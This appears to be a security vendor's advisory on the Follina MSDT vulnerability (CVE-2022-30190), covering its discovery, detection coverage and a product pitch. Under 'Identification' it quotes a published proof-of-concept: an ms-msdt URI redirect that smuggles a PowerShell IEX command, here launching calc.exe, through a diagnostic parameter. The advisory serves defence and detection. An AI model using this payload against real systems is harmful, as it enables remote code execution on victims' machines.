UPDATE: This vulnerability has now been assigned to CVE-2022-30190 and Microsoft has issued guidance, see reference below.
Application Details
MSDT - (Microsoft Diagnostic Tool) Invokes a troubleshooting pack at the command line or as part of an automated script, and enables additional options without user input.
Vulnerability
Japanese security researcher @nao_sec reported on Twitter that they had discovered a zero day exploit inside a malicious Word document. This document loads a HTML file from a remote webserver. The ms-msdt MSProtocol URI is then used to load the code to perform the code execution. Security researcher Kevin Beaumont reported that the exploit works even with Office macros disabled and has deemed the exploit "Follina" (the area code of Follina in Italy is 0438 which is the file reference of the sample) . As more research is being carried out on this exploit we are seeing different payloads being used and will update our information as necessary.
Identification
This is an example of a PoC which has been published and contains similar characteristics to others that we have seen:
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (4096 characters or more)
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";
Detection
By creating a traffic file and corresponding rule we are able to detect attempts to perform remote code execution on an affected system.
Coverage
Idappcom has created signature 8022755 along with a traffic file.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional
Comments